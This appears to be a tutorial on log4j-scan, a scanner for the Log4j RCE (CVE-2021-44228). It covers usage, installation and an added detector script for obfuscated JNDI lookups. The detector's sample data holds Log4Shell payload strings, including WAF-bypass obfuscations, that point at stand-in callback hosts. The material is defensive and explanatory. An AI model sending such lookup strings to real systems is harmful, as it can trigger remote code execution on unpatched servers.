In this article, I will walk you through using log4j-scan, the most accurate and fully automatic scanning tool for finding servers vulnerable to the Log4j RCE.
Features
- Supports list of URLs.
- Fuzzing of over 60 HTTP request headers (not just the 3-4 headers covered by earlier tools).
- Fuzzing of HTTP POST data parameters.
- Fuzzing of JSON parameters.
- DNS callback support to detect and validate vulnerabilities.
- WAF bypass payloads.
Description
The authors have been researching the Log4j RCE (CVE-2021-44228) since it was disclosed and have been working to stop this vulnerability. Their team developed an open-source scanning tool to detect the Log4j RCE (CVE-2021-44228) and help developers patch it. Security teams can use the tool to scan their infrastructure for the Log4j RCE and also to check for WAF bypasses that could lead to code execution in the project environment.
It supports instant OOB DNS callbacks, so there is no need to set up your own DNS callback server.
Usage
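The scanner works by placing a JNDI lookup string in many request headers, query parameters and body fields and waiting for the DNS callback. On the receiving side, a defender wants to recognize exactly those strings in request data, including the obfuscated forms that WAF bypass payloads rely on. The following is an added example written for this article; it is not part of log4j-scan and does not use its code. The request dictionaries and the callback hosts under `.invalid` are constructed sample data, and the normalization rules cover the well-known nested-lookup tricks (`${lower:x}`, `${upper:x}`, `${::-x}`, `${name:-x}`) plus URL encoding.

```python
"""Detect Log4Shell-style JNDI lookup strings in HTTP request data.

Added example for this article; it is not part of log4j-scan. It shows the
receiving side of a scan: the lookup strings a scanner (or attacker) places
in request headers, query parameters and POST bodies, including the
obfuscated forms that WAF-bypass payloads use. All sample requests are
constructed; the callback hosts use the reserved .invalid TLD.
"""
import re
from urllib.parse import unquote

# Innermost nested lookups that resolve to a literal. `[^${}]` keeps each
# regex on the innermost `${...}` so nesting is peeled one layer per round.
#   ${lower:X} / ${upper:X}      -> X
#   ${::-X} / ${env:NOPE:-X}     -> X   (default-value form)
# The negative lookahead stops the default-value rule from eating a real
# ${jndi:...} lookup whose URL happens to contain ":-".
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}", re.I)
_DEFAULT_LOOKUP = re.compile(r"\$\{(?!\s*jndi)[^${}]*?:-([^${}]*)\}", re.I)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize(value: str, rounds: int = 10) -> str:
    """Collapse URL encoding and nested lookup obfuscation so that
    '${${lower:j}ndi:...}' and '${${::-j}ndi:...}' both read '${jndi:...}'."""
    text = value
    for _ in range(rounds):
        before = text
        text = unquote(text)                        # %24%7B -> ${
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == before:                          # nothing left to peel
            break
    return text.lower()


def find_jndi_indicators(request: dict) -> list:
    """Return (location, normalized_value) for every request field that
    carries a JNDI lookup after normalization. `request` is a constructed
    dict with 'headers' (dict), 'query' (dict) and 'body' (str)."""
    hits = []
    for name, value in request.get("headers", {}).items():
        norm = normalize(value)
        if _JNDI.search(norm):
            hits.append((f"header:{name}", norm))
    for name, value in request.get("query", {}).items():
        norm = normalize(value)
        if _JNDI.search(norm):
            hits.append((f"query:{name}", norm))
    body = normalize(request.get("body", ""))
    if _JNDI.search(body):
        hits.append(("body", body))
    return hits


# Constructed sample requests (not real traffic).
SAMPLE_REQUESTS = [
    # 1. Ordinary request: nothing to report.
    {"headers": {"User-Agent": "Mozilla/5.0", "Accept": "*/*"},
     "query": {"page": "2"}, "body": ""},
    # 2. Plain lookup in an uncommon header, the kind a 60-header fuzzer reaches.
    {"headers": {"User-Agent": "Mozilla/5.0",
                 "X-Api-Version": "${jndi:ldap://callback.example.invalid/a}"},
     "query": {}, "body": ""},
    # 3. Obfuscated lookups: URL-encoded in a header, case-lookup in a query
    #    parameter, default-value lookups in a JSON body.
    {"headers": {"X-Forwarded-For":
                 "%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example.invalid%2Fb%7D"},
     "query": {"q": "${${lower:j}ndi:ldap://callback.example.invalid/c}"},
     "body": '{"username": "${${::-j}${::-n}${::-d}${::-i}:'
             'ldap://callback.example.invalid/d}"}'},
]

if __name__ == "__main__":
    for i, req in enumerate(SAMPLE_REQUESTS, 1):
        for location, value in find_jndi_indicators(req):
            print(f"request {i}: JNDI lookup in {location}: {value}")
```

The same normalization can be run over access-log or WAF log fields; the point is to normalize before matching, because a plain `${jndi:` signature misses every one of the obfuscated variants in the third sample request.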
$ python3 log4j-scan.py -h
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Check a single URL.
  -p PROXY, --proxy PROXY
                        Send requests through proxy. proxy should be specified in the format supported by requests (http[s]://<proxy-ip>:<proxy-port>)
  -l USEDLIST, --list USEDLIST
                        Check a list of URLs.
  --request-type REQUEST_TYPE
                        Request Type: (get, post) - [Default: get].
  --headers-file HEADERS_FILE
                        Headers fuzzing list - [default: headers.txt].
  --run-all-tests       Run all available tests on each URL.
  --exclude-user-agent-fuzzing
                        Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.
  --wait-time WAIT_TIME
                        Wait time after all URLs are processed (in seconds) - [Default: 5].
  --waf-bypass          Extend scans with WAF bypass payloads.
  --test-CVE-2021-45046
                        Test using payloads for CVE-2021-45046 (detection payloads).
  --dns-callback-provider DNS_CALLBACK_PROVIDER
                        DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh].
  --custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST
                        Custom DNS Callback Host.
  --disable-http-redirects
                        Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems.
Scan a single website
$ python3 log4j-scan.py -u https://log4j.lab.secbot.local
Scan a single URL using all request methods: GET, POST (URL-encoded form) and POST (JSON body)
$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --run-all-tests
Extend the scan with WAF bypass payloads
$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --waf-bypass
Scan a list of URLs
$ python3 log4j-scan.py -l urls.txt
Installation
$ pip3 install -r requirements.txt
Docker support
$ git clone https://github.com/fullhunt/log4j-scan.git
$ cd log4j-scan
$ sudo docker build -t log4j-scan .
$ sudo docker run -it --rm log4j-scan
# With URL list "urls.txt" in current directory
$ docker run -it --rm -v $PWD:/data log4j-scan -l /data/urls.txt
Disclaimer
This project is made for educational and pentest purposes only. It is illegal to use log4j-scan to attack targets without the prior consent of both parties. It is your responsibility to comply with all applicable laws of the country in which you live. The developers and Anonyviet will not bear any liability for damage caused by the article or the tool.